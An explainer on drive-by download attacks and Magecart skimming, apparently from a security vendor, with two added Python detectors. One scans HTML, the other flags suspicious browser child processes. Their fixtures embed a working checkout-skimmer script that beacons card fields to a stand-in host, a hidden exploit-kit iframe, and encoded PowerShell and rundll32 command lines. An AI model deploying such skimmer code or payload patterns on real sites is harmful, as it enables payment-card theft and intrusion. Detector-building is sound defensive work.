
Understanding Drive-by Download Attacks

Drive-by download attacks occur when a threat actor compromises a website, link, or digital advertisement, tricking users into downloading malware from corrupted links.

An employee at a large organisation is doing research for a client and opens what they believe is a legitimate website. What they don’t realise is that, while they’re browsing, a Trojan is silently downloading onto their endpoint. The attacker uses that foothold to move from the endpoint into the organisation’s network, and suddenly the security team’s alarms ring as ransomware takes hold in the environment.

This kind of covert attack, one that happens without the user realising it, is known as a drive-by download attack. It has become a common approach for threat actors who want to skip traditional social engineering and launch sophisticated attacks without detection.

What Are Drive-By Download Attacks?

Drive-by download attacks occur when a threat actor compromises a website, link, or digital advertisement so that simply visiting it delivers malware to the user’s device, often with no click beyond loading the page. When the compromised site is chosen because a specific target group is known to frequent it, the technique is called a watering hole attack; watering holes are a targeted form of drive-by, not a synonym for it. The payload is not necessarily fileless: some drive-by chains run entirely in memory, others write an executable to disk, depending on the threat actor and the malware they are using.

This tactic allows threat actors to bypass the effort of social engineering and instead lie in wait, knowing users will come to them.

Examples of drive-by download attacks used by threat actors include:

  • Compromising legitimate websites users already frequent, so no lure is needed
  • Malvertising: placing malicious code, from adware to exploit kit redirects, in online advertisements served through legitimate ad networks, so it runs on sites the attacker never touched
  • Redirecting visitors, typically through a hidden iframe or an injected script, to an exploit kit landing page that fingerprints the browser, plugins and operating system and fires an exploit for any unpatched vulnerability it finds
  • Serving booby-trapped downloads and pop-ups, such as fake media player updates or codec installers, that a user is tricked into accepting and running

The Magecart attacks, first tracked around 2015 and still an often-repeated tactic, show how this method works for threat actors. Threat actors gained access to online retailers’ websites (in some cases through a third-party script the sites loaded) and injected JavaScript that skims shoppers’ payment card details from the checkout form and sends them to an attacker-controlled server. Nothing is installed on the shopper’s endpoint; the malicious code runs in the browser, so every customer who completes a purchase on the compromised page becomes a victim of theft.
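The indicators listed above (hidden iframes pointing at exploit kit landing pages, foreign scripts injected into a page, Magecart-style form skimmers and obfuscated inline code) can be checked for mechanically. The scanner below is an added example, not code from the original article or from Arctic Wolf: it runs a simplified version of the checks a web-content scanner or proxy applies to a fetched page. The storefront HTML, the first-party host shop.example and every other hostname in it are constructed for this illustration.

```python
"""Scan a page's HTML for drive-by download and web-skimmer indicators.

Added example, not code from the original article or from Arctic Wolf. It is a
simplified version of the checks a web-content scanner or proxy would run.
SAMPLE_HTML, FIRST_PARTY_HOST and every hostname in it are constructed for this
illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY_HOST = "shop.example"  # assumed origin of the page being checked

# Constructed storefront page: a first-party script, an analytics tag, and three
# injected elements (hidden exploit-kit iframe, checkout skimmer, obfuscated script).
SAMPLE_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.analytics-vendor.example/tag.js"></script>
</head><body>
<form id="checkout"><input name="cardnumber"><input name="cvv"></form>
<iframe src="https://landing.exploit-kit.example/gate.php" width="1" height="1"
        style="visibility:hidden"></iframe>
<script>
document.getElementById("checkout").addEventListener("submit", function (e) {
  var data = JSON.stringify(Object.fromEntries(new FormData(e.target)));
  navigator.sendBeacon("https://stats.collector.example/c.php", btoa(data));
});
</script>
<script>eval(unescape("%61%6c%65%72%74%28%31%29"));</script>
</body></html>
"""

URL_RE = re.compile(r"https?://[^\s\"'()<>]+")
FORM_ACCESS_RE = re.compile(r"\bsubmit\b|FormData|\.value\b")          # reads form input
EXFIL_RE = re.compile(r"sendBeacon|XMLHttpRequest|fetch\s*\(|new\s+Image\b")  # sends it somewhere
OBFUSCATION_RE = re.compile(r"eval\s*\(\s*(unescape|atob|String\.fromCharCode)\b")


def _is_hidden(attrs):
    """True for iframes sized to 1px or less or hidden via attribute/inline CSS."""
    try:
        tiny = int(attrs.get("width", 100)) <= 1 or int(attrs.get("height", 100)) <= 1
    except ValueError:  # e.g. width="100%"
        tiny = False
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return tiny or "hidden" in attrs or "display:none" in style or "visibility:hidden" in style


class DriveByScanner(HTMLParser):
    def __init__(self, first_party, allowed_hosts):
        super().__init__()
        self.first_party = first_party
        self.allowed = set(allowed_hosts)   # known-good third parties (CDN, analytics)
        self.findings = []                  # (indicator, detail) pairs
        self._in_script = False
        self._script = []

    def _foreign(self, url):
        """Hostname of url if it is neither first-party nor allow-listed, else None."""
        host = urlparse(url).hostname
        if host is None or host == self.first_party or host in self.allowed:
            return None
        return host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src") or ""
            if _is_hidden(a) or self._foreign(src):
                self.findings.append(("hidden-or-foreign-iframe", src))
        elif tag == "script":
            src = a.get("src")
            if src is None:                 # inline script: collect body for analysis
                self._in_script, self._script = True, []
            elif self._foreign(src):
                self.findings.append(("third-party-script", src))

    def handle_data(self, data):
        if self._in_script:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag != "script" or not self._in_script:
            return
        self._in_script = False
        body = "".join(self._script)
        foreign = {self._foreign(u) for u in URL_RE.findall(body)} - {None}
        # Skimmer heuristic: touches form data AND has an exfil primitive AND a foreign URL.
        if FORM_ACCESS_RE.search(body) and EXFIL_RE.search(body) and foreign:
            self.findings.append(("inline-skimmer", ",".join(sorted(foreign))))
        if OBFUSCATION_RE.search(body):
            self.findings.append(("obfuscated-script", body.strip()[:40]))


def scan(html, first_party=FIRST_PARTY_HOST, allowed_hosts=()):
    """Return the list of (indicator, detail) findings for one page."""
    scanner = DriveByScanner(first_party, allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for indicator, detail in scan(SAMPLE_HTML, allowed_hosts={"cdn.analytics-vendor.example"}):
        print(f"{indicator:26} {detail}")
```

The allow-list matters in practice: a real storefront legitimately loads scripts from CDNs and analytics vendors, so "third-party script" on its own is noise. The finding that should page someone is a script, first- or third-party, that reads checkout fields and beacons them to a host the site has never used, which is exactly the Magecart pattern.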

How Drive-By Download Attacks Work

Drive-by download attacks differ by the threat actor’s motivation (in the Magecart example the goal is to steal payment card data), so the malware strain and the outcome vary. But the attack follows a few universal steps.

1. The threat actor compromises a website: one a target organisation is known to frequent (a watering hole, if the attack is targeted) or simply one that is popular with users. Alternatively, they buy ad placements and deliver the malicious content through an ad network.

2. Users visit that site or click a compromised link. Loading the page runs the injected content, which the user never sees.

3. The injected content redirects the browser to an exploit kit or serves a malicious download. A successful exploit of an unpatched browser, plugin or operating system vulnerability, or a user who runs the download, gives the threat actor code execution on the endpoint.

4. From that foothold the threat actor launches the follow-on attack, be it ransomware, data exfiltration, credential theft, or another common attack type.

As mentioned above, a threat actor can use a variety of tools from their toolkit during a drive-by download attack, because the crux of the attack is the compromised website or other digital asset, not any one payload.
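Step 3 of the chain above is where endpoint telemetry can catch a drive-by regardless of which payload the kit delivers: a browser process should not be the parent of a script interpreter or a signed system binary such as rundll32, and an executable should not be running out of the Downloads or Temp folder moments after a page load. The detection below is an added example, not code from the original article or from Arctic Wolf. It runs two such rules over process-creation events in a simplified Sysmon-style JSON-lines shape; the event lines, hostnames, users and field names are constructed for this illustration and are not a vendor schema.

```python
"""Flag process-creation events consistent with a drive-by download.

Added example, not code from the original article or from Arctic Wolf. The
events below are constructed for this illustration in a simplified
Sysmon-style JSON-lines shape; the field names are an assumption, not a
vendor schema.
"""
import json
import ntpath

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "iexplore.exe"}
# Interpreters and signed system binaries a browser should never launch directly;
# exploit-kit and fake-installer payloads commonly do.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}
DROP_DIRS = ("\\downloads\\", "\\appdata\\local\\temp\\")

# Constructed telemetry: two benign browser children, three that are not.
SAMPLE_EVENTS = r"""
{"time":"2024-05-02T09:14:03Z","host":"WS-0142","user":"CORP\\alice","parent_image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","command_line":"chrome.exe --type=renderer"}
{"time":"2024-05-02T09:14:09Z","host":"WS-0142","user":"CORP\\alice","parent_image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -nop -w hidden -enc <constructed>"}
{"time":"2024-05-02T09:16:41Z","host":"WS-0142","user":"CORP\\alice","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Users\\alice\\Downloads\\Invoice_0427.pdf.exe","command_line":"C:\\Users\\alice\\Downloads\\Invoice_0427.pdf.exe"}
{"time":"2024-05-02T09:20:12Z","host":"WS-0077","user":"CORP\\bob","parent_image":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe","image":"C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe","command_line":"Acrobat.exe C:\\Users\\bob\\Downloads\\report.pdf"}
{"time":"2024-05-02T09:22:55Z","host":"WS-0077","user":"CORP\\bob","parent_image":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","image":"C:\\Windows\\System32\\rundll32.exe","command_line":"rundll32.exe C:\\Users\\bob\\AppData\\Local\\Temp\\upd.dll,Start"}
"""


def _base(path):
    """Lower-cased file name of a Windows path; ntpath works on any host OS."""
    return ntpath.basename(path).lower()


def classify(ev):
    """Return a rule name if the event is suspicious, else None."""
    parent, child = _base(ev["parent_image"]), _base(ev["image"])
    image = ev["image"].lower()
    if parent in BROWSERS and child in INTERPRETERS:
        return "browser-spawned-interpreter"
    # A download run straight from the drop folder, whether the browser
    # launched it or the user double-clicked it in Explorer.
    if parent in BROWSERS | {"explorer.exe"} and any(d in image for d in DROP_DIRS):
        return "executed-from-download-dir"
    return None


def detect(event_lines):
    """Run classify() over JSON-lines telemetry and return enriched alerts."""
    alerts = []
    for line in event_lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        rule = classify(ev)
        if rule:
            child = _base(ev["image"])
            alerts.append({
                "rule": rule,
                "time": ev["time"], "host": ev["host"], "user": ev["user"],
                "parent": _base(ev["parent_image"]), "image": ev["image"],
                "command_line": ev["command_line"],
                # "Invoice.pdf.exe" style names are a classic lure worth surfacing.
                "double_extension": child.count(".") > 1,
            })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['time']} {a['host']} {a['rule']}: {a['parent']} -> {a['image']}")
```

Edge opening a PDF in Acrobat is the kind of benign browser child that a cruder "browser spawned anything" rule would drown the analyst in; keying on interpreters and drop directories keeps the rule quiet on normal workstations. In a real deployment the rules would be tuned against the organisation’s own baseline and joined to web proxy logs so the alert carries the URL the user visited.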

Payloads commonly delivered by a drive-by download include:

  • Ransomware
  • Trojans, including remote access Trojans and banking Trojans
  • Spyware and keyloggers
  • Adware
  • Botnet agents that enrol the endpoint in a botnet
  • Rootkits
  • Cryptojacking miners

Exploit kits belong in this picture as the delivery mechanism rather than the payload: the kit gains code execution, and any of the above is what it then drops.

How Can Users Prevent Falling Prey to Drive-By Download Attacks?

Because drive-by download attacks are dependent on users not realising what’s happening, they can be hard to detect and harder to prevent. But there are a few steps organisations and individuals can take to stop this increasingly common threat.

1. Implement a risk-based vulnerability management program to reduce the risk posed by exploit kits. Exploit kits fingerprint the user’s browser, plugins and operating system and fire exploits for known, unpatched vulnerabilities. If your organisation keeps browsers and endpoints patched promptly, the exploit kit has nothing to fire and the attack fails before it begins. Note that patching does not help against the other variant, a user tricked into running a fake installer, which is why the next two steps still matter.

2. Have browser security controls and endpoint protection in place to stop malware from downloading or executing. Antivirus and endpoint detection tools, though a basic layer, still block known malicious files and behaviours such as a browser launching a script interpreter. Browser controls on users’ endpoints, including web filtering that blocks known-malicious sites and ad domains, disabling unneeded plugins, and browser isolation that renders pages away from the endpoint, keep the malicious content from reaching or running on the device, reducing drive-by download risk.

3. Conduct security awareness training to educate users on the risks they face when browsing online or clicking on links.


The Role of Security Awareness Training in Stopping Drive-By Download Attacks

Users are still the entry point for drive-by download attacks: they choose which sites to visit, whether to accept a pop-up or run a downloaded file, and whether to report a browser that suddenly behaves oddly. Educating users on how to spot these tactics can help an organisation stay safe while reducing human risk.

Organisations need to educate employees on specific attack types, including drive-by downloads, so they can spot threats before they turn into attacks. The best way to do that is by implementing a robust security awareness training program that creates a culture of awareness, builds good habits, and actively reduces human risk at every level of the organisation.

Arctic Wolf® Managed Security Awareness® does exactly that, utilising up-to-date content, security expertise, and microlearning to help your users spot risks, stay safe, and build a culture of awareness.

Learn more about our security training platform.
Learn more about the kinds of cyber attacks your organisation could face with the Arctic Wolf 2024 Security Operations Report.
